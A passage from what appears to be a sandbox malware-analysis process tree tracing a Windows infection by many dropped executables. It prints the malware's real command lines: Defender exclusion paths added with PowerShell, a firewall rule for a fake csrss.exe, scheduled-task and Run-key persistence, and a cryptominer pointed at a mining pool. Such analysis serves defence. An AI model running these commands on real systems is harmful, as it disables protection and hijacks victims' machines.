      4⤵
      Program crash
      PID:4440
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 764
      4⤵
      Program crash
      PID:3148
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 756
      4⤵
      Program crash
      PID:380
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 764
      4⤵
      Program crash
      PID:3480
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 748
      4⤵
      Program crash
      PID:4960
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 764
      4⤵
      Program crash
      PID:2996
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 816
      4⤵
      Program crash
      PID:2740
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 728
      4⤵
      Program crash
      PID:3332
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 872
      4⤵
      Program crash
      PID:4452
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 836
      4⤵
      Program crash
      PID:4132
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 740
      4⤵
      Program crash
      PID:4964
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 720
      4⤵
      Program crash
      PID:2396
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 852
      4⤵
      Program crash
      PID:552
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 896
      4⤵
      Program crash
      PID:4004
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:2620
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 680
      4⤵
      Program crash
      PID:6492
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 692
      4⤵
      Program crash
      PID:676
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 824
      4⤵
      Program crash
      PID:5208
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 828
      4⤵
      Program crash
      PID:3668
  - - C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
      "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
      4⤵
      PID:2472
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2472 -s 340
        5⤵
        Program crash
        
        PID:4004
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2472 -s 364
        5⤵
        Program crash
        
        PID:6196
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2472 -s 344
        5⤵
        Program crash
        
        PID:3184
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2472 -s 656
        5⤵
        Program crash
        
        PID:6860
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2472 -s 668
        5⤵
        Program crash
        
        PID:5204
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2472 -s 692
        5⤵
        Program crash
        
        PID:1048
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2472 -s 692
        5⤵
        Program crash
        
        PID:2968
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2472 -s 720
        5⤵
        Program crash
        
        PID:5052
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2472 -s 744
        5⤵
        Program crash
        
        PID:4904
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:2872
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2472 -s 712
        5⤵
        Program crash
        
        PID:1436
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2472 -s 824
        5⤵
        Program crash
        
        PID:980
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2472 -s 856
        5⤵
        
        PID:7120
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2472 -s 692
        5⤵
        
        PID:4228
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2472 -s 804
        5⤵
        
        PID:6316
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2472 -s 688
        5⤵
        
        PID:7248
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:6012
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:8264
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2472 -s 784
        5⤵
        
        PID:8028
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:7188
- - C:\Users\Admin\AppData\Local\Temp\rty25.exe
    "C:\Users\Admin\AppData\Local\Temp\rty25.exe"
    3⤵
    - Executes dropped EXE
    PID:2320
- C:\Users\Admin\AppData\Local\Temp\Files\ma.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ma.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:3036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp84DF.tmp.bat""
    3⤵
    PID:368
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:724
  - - C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
      "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
      4⤵
      PID:4156
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
        5⤵
        
        PID:3156
- C:\Users\Admin\AppData\Local\Temp\Files\32.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\32.exe"
  2⤵
  - Executes dropped EXE
  PID:1668
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1668 -s 264
    3⤵
    - Program crash
    PID:224
- C:\Users\Admin\AppData\Local\Temp\Files\fund.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\fund.exe"
  2⤵
  PID:1964
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\DriverHostCrtNet\jO3lbUgUCuGG0nAZHcS.vbe"
    3⤵
    PID:2740
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\DriverHostCrtNet\ELvGRxvU.bat" "
      4⤵
      PID:1576
    - - C:\DriverHostCrtNet\comSvc.exe
        
        "C:\DriverHostCrtNet\comSvc.exe"
        5⤵
        
        PID:3284
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
        6⤵
        
        PID:4304
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
        6⤵
        
        PID:2644
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
        6⤵
        
        PID:4580
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
        6⤵
        
        PID:4072
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
        6⤵
        
        PID:4736
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
        6⤵
        
        PID:5048
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
        6⤵
        
        PID:8
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
        6⤵
        
        PID:4620
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/odt/'
        6⤵
        
        PID:1376
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/DriverHostCrtNet/'
        6⤵
        
        PID:4252
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
        6⤵
        
        PID:2088
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
        6⤵
        
        PID:5076
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
        6⤵
        
        PID:744
      - C:\Program Files\Windows NT\TableTextService\en-US\Registry.exe
        
        "C:\Program Files\Windows NT\TableTextService\en-US\Registry.exe"
        6⤵
        
        PID:6132
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\74a3f05b-0ef9-4512-a577-f748416b2481.vbs"
        7⤵
        
        PID:996
        
        C:\Program Files\Windows NT\TableTextService\en-US\Registry.exe
        
        "C:\Program Files\Windows NT\TableTextService\en-US\Registry.exe"
        8⤵
        
        PID:3964
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e3a09b30-96e5-46b2-926c-8e4c62ba5232.vbs"
        7⤵
        
        PID:2740
- C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe"
  2⤵
  PID:3324
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /C schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
    3⤵
    PID:1956
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
      4⤵
      Creates scheduled task(s)
      PID:784
- C:\Users\Admin\AppData\Local\Temp\Files\soft.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\soft.exe"
  2⤵
  PID:1724
- - C:\Users\Admin\AppData\Local\Temp\Files\soft.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\soft.exe"
    3⤵
    PID:1232
- C:\Users\Admin\AppData\Local\Temp\Files\hv.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\hv.exe"
  2⤵
  PID:4980
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    3⤵
    PID:3772
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Tests_for_preparation_for_the_academy';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Tests_for_preparation_for_the_academy' -Value '"C:\Users\Admin\AppData\Local\Tests_for_preparation_for_the_academy\Tests_for_preparation_for_the_academy.exe"' -PropertyType 'String'
    3⤵
    PID:3100
- C:\Users\Admin\AppData\Local\Temp\Files\Awwnbpxqsf.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Awwnbpxqsf.exe"
  2⤵
  PID:1444
- - C:\Users\Admin\AppData\Local\Temp\Files\Awwnbpxqsf.exe
    C:\Users\Admin\AppData\Local\Temp\Files\Awwnbpxqsf.exe
    3⤵
    PID:6468
- - C:\Users\Admin\AppData\Local\Temp\Files\Awwnbpxqsf.exe
    C:\Users\Admin\AppData\Local\Temp\Files\Awwnbpxqsf.exe
    3⤵
    PID:1928
- - C:\Users\Admin\AppData\Local\Temp\Files\Awwnbpxqsf.exe
    C:\Users\Admin\AppData\Local\Temp\Files\Awwnbpxqsf.exe
    3⤵
    PID:1352
- - C:\Users\Admin\AppData\Local\Temp\Files\Awwnbpxqsf.exe
    C:\Users\Admin\AppData\Local\Temp\Files\Awwnbpxqsf.exe
    3⤵
    PID:2428
- - C:\Users\Admin\AppData\Local\Temp\Files\Awwnbpxqsf.exe
    C:\Users\Admin\AppData\Local\Temp\Files\Awwnbpxqsf.exe
    3⤵
    PID:3304
- - C:\Users\Admin\AppData\Local\Temp\Files\Awwnbpxqsf.exe
    C:\Users\Admin\AppData\Local\Temp\Files\Awwnbpxqsf.exe
    3⤵
    PID:4488
- - C:\Users\Admin\AppData\Local\Temp\Files\Awwnbpxqsf.exe
    C:\Users\Admin\AppData\Local\Temp\Files\Awwnbpxqsf.exe
    3⤵
    PID:4456
- - C:\Users\Admin\AppData\Local\Temp\Files\Awwnbpxqsf.exe
    C:\Users\Admin\AppData\Local\Temp\Files\Awwnbpxqsf.exe
    3⤵
    PID:6152
- - C:\Users\Admin\AppData\Local\Temp\Files\Awwnbpxqsf.exe
    C:\Users\Admin\AppData\Local\Temp\Files\Awwnbpxqsf.exe
    3⤵
    PID:5976
- - C:\Users\Admin\AppData\Local\Temp\Files\Awwnbpxqsf.exe
    C:\Users\Admin\AppData\Local\Temp\Files\Awwnbpxqsf.exe
    3⤵
    PID:1888
- C:\Users\Admin\AppData\Local\Temp\Files\dsdasda.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\dsdasda.exe"
  2⤵
  PID:4080
- C:\Users\Admin\AppData\Local\Temp\Files\leg221.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\leg221.exe"
  2⤵
  PID:2524
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe"
    3⤵
    PID:6812
- C:\Users\Admin\AppData\Local\Temp\Files\Project_8.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Project_8.exe"
  2⤵
  PID:3692
- - C:\Users\Admin\AppData\Local\Temp\648b5vt13485v134322685vt.exe
    "C:\Users\Admin\AppData\Local\Temp\648b5vt13485v134322685vt.exe"
    3⤵
    PID:6600
- C:\Users\Admin\AppData\Local\Temp\Files\Setup11.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Setup11.exe"
  2⤵
  PID:3376
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
    3⤵
    PID:5332
  - - C:\Users\Admin\Pictures\GcKZbz5oi3biBdyLfkJTM261.exe
      "C:\Users\Admin\Pictures\GcKZbz5oi3biBdyLfkJTM261.exe"
      4⤵
      PID:5888
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5888 -s 376
        5⤵
        Program crash
        
        PID:1512
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5888 -s 380
        5⤵
        Program crash
        
        PID:2296
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5888 -s 380
        5⤵
        Program crash
        
        PID:6612
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5888 -s 680
        5⤵
        Program crash
        
        PID:4028
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5888 -s 716
        5⤵
        Program crash
        
        PID:5748
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5888 -s 740
        5⤵
        Program crash
        
        PID:4132
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5888 -s 716
        5⤵
        Program crash
        
        PID:5608
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5888 -s 468
        5⤵
        Program crash
        
        PID:5992
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5888 -s 468
        5⤵
        Program crash
        
        PID:1456
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:4352
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5888 -s 748
        5⤵
        Program crash
        
        PID:6764
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5888 -s 692
        5⤵
        Program crash
        
        PID:3088
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5888 -s 824
        5⤵
        Program crash
        
        PID:6108
    - - C:\Users\Admin\Pictures\GcKZbz5oi3biBdyLfkJTM261.exe
        
        "C:\Users\Admin\Pictures\GcKZbz5oi3biBdyLfkJTM261.exe"
        5⤵
        
        PID:2748
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2748 -s 340
        6⤵
        
        PID:6848
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2748 -s 344
        6⤵
        
        PID:2960
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2748 -s 652
        6⤵
        
        PID:3152
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2748 -s 664
        6⤵
        
        PID:8020
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2748 -s 664
        6⤵
        
        PID:5016
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2748 -s 716
        6⤵
        
        PID:3504
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2748 -s 664
        6⤵
        
        PID:6640
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2748 -s 708
        6⤵
        
        PID:4308
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2748 -s 732
        6⤵
        
        PID:7612
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:3212
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2748 -s 876
        6⤵
        
        PID:7308
  - - C:\Users\Admin\Pictures\grjCuwQRHe8DsPdSEwjYiE6O.exe
      "C:\Users\Admin\Pictures\grjCuwQRHe8DsPdSEwjYiE6O.exe"
      4⤵
      PID:1984
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1984 -s 372
        5⤵
        Program crash
        
        PID:6048
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1984 -s 396
        5⤵
        Program crash
        
        PID:6904
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1984 -s 416
        5⤵
        Program crash
        
        PID:5860
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1984 -s 680
        5⤵
        Program crash
        
        PID:5704
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1984 -s 692
        5⤵
        Program crash
        
        PID:7036
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1984 -s 736
        5⤵
        Program crash
        
        PID:6856
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1984 -s 732
        5⤵
        Program crash
        
        PID:6068
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1984 -s 736
        5⤵
        Program crash
        
        PID:3676
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1984 -s 756
        5⤵
        Program crash
        
        PID:6688
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:7104
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1984 -s 744
        5⤵
        Program crash
        
        PID:5992
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1984 -s 680
        5⤵
        Program crash
        
        PID:4900
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1984 -s 792
        5⤵
        
        PID:4888
    - - C:\Users\Admin\Pictures\grjCuwQRHe8DsPdSEwjYiE6O.exe
        
        "C:\Users\Admin\Pictures\grjCuwQRHe8DsPdSEwjYiE6O.exe"
        5⤵
        
        PID:1688
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1688 -s 340
        6⤵
        
        PID:7620
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1688 -s 652
        6⤵
        
        PID:4328
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1688 -s 736
        6⤵
        
        PID:7620
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1688 -s 748
        6⤵
        
        PID:6340
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:1616
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1688 -s 816
        6⤵
        
        PID:7724
  - - C:\Users\Admin\Pictures\Rc4ajBUjf6dLeB1M0JFAZVG6.exe
      "C:\Users\Admin\Pictures\Rc4ajBUjf6dLeB1M0JFAZVG6.exe" PeJj3z5KgQO+REOMHfxRWZMfrERTkhHmRUWETPcQX9Iwim5oqDrINyf9NcQnEA==
      4⤵
      PID:5848
  - - C:\Users\Admin\Pictures\i6FPcEU6wmuTYoip0Az8H7wc.exe
      "C:\Users\Admin\Pictures\i6FPcEU6wmuTYoip0Az8H7wc.exe" --silent --allusers=0
      4⤵
      PID:6616
    - - C:\Users\Admin\Pictures\i6FPcEU6wmuTYoip0Az8H7wc.exe
        
        C:\Users\Admin\Pictures\i6FPcEU6wmuTYoip0Az8H7wc.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.66 --initial-client-data=0x2e8,0x2ec,0x2f0,0x2c4,0x2f4,0x6e539558,0x6e539564,0x6e539570
        5⤵
        
        PID:1220
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\i6FPcEU6wmuTYoip0Az8H7wc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\i6FPcEU6wmuTYoip0Az8H7wc.exe" --version
        5⤵
        
        PID:3396
    - - C:\Users\Admin\Pictures\i6FPcEU6wmuTYoip0Az8H7wc.exe
        
        "C:\Users\Admin\Pictures\i6FPcEU6wmuTYoip0Az8H7wc.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=6616 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240130004847" --session-guid=50ec2ac4-6c52-4e52-96db-a071b67e20f2 --server-tracking-blob=Zjc5NjcxYjA5NGI0ZGExMjVlNDg5NTE2M2JjNTY3OWVhODk4ZThiOTMxNDQwN2YxZDI4MzM1N2VlNGM5NTUyMDp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcwNjU3NTcxMS42OTg5IiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiJiNTUxNTk2YS1lM2QwLTQyZmItOTc1YS1jYTYzNDk5NWNmMzIifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=4C04000000000000
        5⤵
        
        PID:4272
      - C:\Users\Admin\Pictures\i6FPcEU6wmuTYoip0Az8H7wc.exe
        
        C:\Users\Admin\Pictures\i6FPcEU6wmuTYoip0Az8H7wc.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.66 --initial-client-data=0x300,0x304,0x308,0x2d0,0x30c,0x6da09558,0x6da09564,0x6da09570
        6⤵
        
        PID:6000
      - C:\Users\Admin\AppData\Local\Programs\Opera\106.0.4998.66\installer.exe
        
